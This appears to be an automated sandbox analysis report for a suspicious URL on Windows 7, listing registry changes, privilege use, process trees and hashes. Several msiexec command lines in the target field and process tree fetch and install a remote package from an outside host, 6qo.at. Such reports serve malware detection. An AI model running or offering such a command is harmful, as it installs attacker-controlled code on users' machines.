hxxp://mSieXEC[.]exe-fv"HTTp[://]6qo[.]at[:]8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir"

Analysis

max time kernel
228s
max time network
193s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
03-10-2022 17:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://mSieXEC.exe-fv"HTTp://6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir"

Score

1^/10

Malware Config

Signatures

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D496BCC1-434E-11ED-BB94-5A21EB137514} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0f3d159765a7f43b6bf060b4b70c9a3000000000200000000001066000000010000200000000b2cfc14824181a5067179fc26a740d97c4dbcbf509872555fc2d6ae0ccfbe09000000000e8000000002000020000000555e5dd8b70c7a8e6b30825d16698c72d27cd2cb739345d9ab5e134f1c662f452000000090d8610c11711e989a0b7041c6e590358a5e599f1e9fef90bccee4f4bc4ec4b6400000001569584e7a876835e671e9183e4dd0220934c669e030fc0b83e3e4891f43a586781b44125aafec16b1b07c198a2c1a2ae811f9b71ca184ef16953a64e23badee	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60a427bc5bd7d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371589112"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0f3d159765a7f43b6bf060b4b70c9a30000000002000000000010660000000100002000000054c8dff29f4c54f3ce7990d9d1f27de7baef6c953e6abf12e63b010bde3071a2000000000e800000000200002000000060159e40d0b8620df00b3c9e9bf5d6a02228f5f24cee5f9fb758fd0ea37559c990000000e186a780239bd69635bcc8acaa08ec6662162aa1a372869a6eec7433be4ed7f98d702d62d29826f1b6fd19050d30b7a547476caffe9fbb539fd767d6497861b1d58af2119fee71b41f28c2879514bc5f4759f4892e1877ec35249fa5c57d5c8250ed64192f19369ba2b1ac1c54e6e95583bca945741356a28ff261eafd8407443568fe823addfb782ca6b149b7f9710d400000003661ce958ec2d5999f1d06604fcd0d4da0887c9df46b6031da377fe251ee7388e30618deeb47bb1cd7a8181ad40885402e52f8b0b4dbb7352031180f3a43349e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1384	PowerShell_ISE.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1384	PowerShell_ISE.exe
Token: SeShutdownPrivilege	636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	636	msiexec.exe
Token: SeRestorePrivilege	1596	msiexec.exe
Token: SeTakeOwnershipPrivilege	1596	msiexec.exe
Token: SeSecurityPrivilege	1596	msiexec.exe
Token: SeCreateTokenPrivilege	636	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	636	msiexec.exe
Token: SeLockMemoryPrivilege	636	msiexec.exe
Token: SeIncreaseQuotaPrivilege	636	msiexec.exe
Token: SeMachineAccountPrivilege	636	msiexec.exe
Token: SeTcbPrivilege	636	msiexec.exe
Token: SeSecurityPrivilege	636	msiexec.exe
Token: SeTakeOwnershipPrivilege	636	msiexec.exe
Token: SeLoadDriverPrivilege	636	msiexec.exe
Token: SeSystemProfilePrivilege	636	msiexec.exe
Token: SeSystemtimePrivilege	636	msiexec.exe
Token: SeProfSingleProcessPrivilege	636	msiexec.exe
Token: SeIncBasePriorityPrivilege	636	msiexec.exe
Token: SeCreatePagefilePrivilege	636	msiexec.exe
Token: SeCreatePermanentPrivilege	636	msiexec.exe
Token: SeBackupPrivilege	636	msiexec.exe
Token: SeRestorePrivilege	636	msiexec.exe
Token: SeShutdownPrivilege	636	msiexec.exe
Token: SeDebugPrivilege	636	msiexec.exe
Token: SeAuditPrivilege	636	msiexec.exe
Token: SeSystemEnvironmentPrivilege	636	msiexec.exe
Token: SeChangeNotifyPrivilege	636	msiexec.exe
Token: SeRemoteShutdownPrivilege	636	msiexec.exe
Token: SeUndockPrivilege	636	msiexec.exe
Token: SeSyncAgentPrivilege	636	msiexec.exe
Token: SeEnableDelegationPrivilege	636	msiexec.exe
Token: SeManageVolumePrivilege	636	msiexec.exe
Token: SeImpersonatePrivilege	636	msiexec.exe
Token: SeCreateGlobalPrivilege	636	msiexec.exe
Token: SeShutdownPrivilege	1832	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1832	msiexec.exe
Token: SeCreateTokenPrivilege	1832	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1832	msiexec.exe
Token: SeLockMemoryPrivilege	1832	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1832	msiexec.exe
Token: SeMachineAccountPrivilege	1832	msiexec.exe
Token: SeTcbPrivilege	1832	msiexec.exe
Token: SeSecurityPrivilege	1832	msiexec.exe
Token: SeTakeOwnershipPrivilege	1832	msiexec.exe
Token: SeLoadDriverPrivilege	1832	msiexec.exe
Token: SeSystemProfilePrivilege	1832	msiexec.exe
Token: SeSystemtimePrivilege	1832	msiexec.exe
Token: SeProfSingleProcessPrivilege	1832	msiexec.exe
Token: SeIncBasePriorityPrivilege	1832	msiexec.exe
Token: SeCreatePagefilePrivilege	1832	msiexec.exe
Token: SeCreatePermanentPrivilege	1832	msiexec.exe
Token: SeBackupPrivilege	1832	msiexec.exe
Token: SeRestorePrivilege	1832	msiexec.exe
Token: SeShutdownPrivilege	1832	msiexec.exe
Token: SeDebugPrivilege	1832	msiexec.exe
Token: SeAuditPrivilege	1832	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1832	msiexec.exe
Token: SeChangeNotifyPrivilege	1832	msiexec.exe
Token: SeRemoteShutdownPrivilege	1832	msiexec.exe
Token: SeUndockPrivilege	1832	msiexec.exe
Token: SeSyncAgentPrivilege	1832	msiexec.exe
Token: SeEnableDelegationPrivilege	1832	msiexec.exe
Token: SeManageVolumePrivilege	1832	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1936	iexplore.exe
636	msiexec.exe
636	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1936	iexplore.exe
1936	iexplore.exe
952	IEXPLORE.EXE
952	IEXPLORE.EXE
952	IEXPLORE.EXE
952	IEXPLORE.EXE
952	IEXPLORE.EXE
952	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 952	1936	iexplore.exe	29
PID 1936 wrote to memory of 952	1936	iexplore.exe	29
PID 1936 wrote to memory of 952	1936	iexplore.exe	29
PID 1936 wrote to memory of 952	1936	iexplore.exe	29
PID 1384 wrote to memory of 636	1384	PowerShell_ISE.exe	33
PID 1384 wrote to memory of 636	1384	PowerShell_ISE.exe	33
PID 1384 wrote to memory of 636	1384	PowerShell_ISE.exe	33
PID 1384 wrote to memory of 636	1384	PowerShell_ISE.exe	33
PID 1384 wrote to memory of 636	1384	PowerShell_ISE.exe	33
PID 1384 wrote to memory of 1560	1384	PowerShell_ISE.exe	35
PID 1384 wrote to memory of 1560	1384	PowerShell_ISE.exe	35
PID 1384 wrote to memory of 1560	1384	PowerShell_ISE.exe	35
PID 1384 wrote to memory of 1560	1384	PowerShell_ISE.exe	35
PID 1384 wrote to memory of 1560	1384	PowerShell_ISE.exe	35
PID 1384 wrote to memory of 1832	1384	PowerShell_ISE.exe	36
PID 1384 wrote to memory of 1832	1384	PowerShell_ISE.exe	36
PID 1384 wrote to memory of 1832	1384	PowerShell_ISE.exe	36
PID 1384 wrote to memory of 1832	1384	PowerShell_ISE.exe	36
PID 1384 wrote to memory of 1832	1384	PowerShell_ISE.exe	36

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://mSieXEC.exe-fv"HTTp://6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:952

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" -fv http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:636
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
  2⤵
  PID:1560
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" -fV http//6qo.at:8080/BDBa80NjhORG038O/ioKLK/d3/kexlmrDU/ZZZ=vladimir
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1832

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1628

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x488
1⤵
PID:1600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FFD0HR85.txt

Filesize
608B

MD5
1609f731867ff58ca201880990fe5907

SHA1
65af708f4f33e0fbd7988a459d77fb6edb07cd09

SHA256
65f1f276ce5146d6c988f69b0c2f3575f9c44d77d94c597e8891640a85627f69

SHA512
a80a239c4751a27b40f1f441d806593cedcf640be1095ab7497af0f7e1917a9a14b689eb19b9d51650a11f8edf18b10be2fa92604ec7ed36167e3343624c4496

Download Submit
memory/636-65-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

Filesize
8KB

Download
memory/1384-57-0x000007FEEE310000-0x000007FEEE7D0000-memory.dmp

Filesize
4.8MB

Download
memory/1384-58-0x000007FEED340000-0x000007FEEE30A000-memory.dmp

Filesize
15.8MB

Download
memory/1384-59-0x000007FEEC0E0000-0x000007FEED333000-memory.dmp

Filesize
18.3MB

Download
memory/1384-60-0x000000001D750000-0x000000001DA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1384-61-0x00000000024A6000-0x00000000024C5000-memory.dmp

Filesize
124KB

Download
memory/1384-62-0x00000000024A6000-0x00000000024C5000-memory.dmp

Filesize
124KB

Download
memory/1384-54-0x000007FEF3180000-0x000007FEF3BA3000-memory.dmp

Filesize
10.1MB

Download
memory/1384-56-0x000007FEEE7D0000-0x000007FEEF866000-memory.dmp

Filesize
16.6MB

Download
memory/1384-55-0x000007FEF2620000-0x000007FEF317D000-memory.dmp

Filesize
11.4MB

Download
memory/1384-72-0x00000000024A6000-0x00000000024C5000-memory.dmp

Filesize
124KB

Download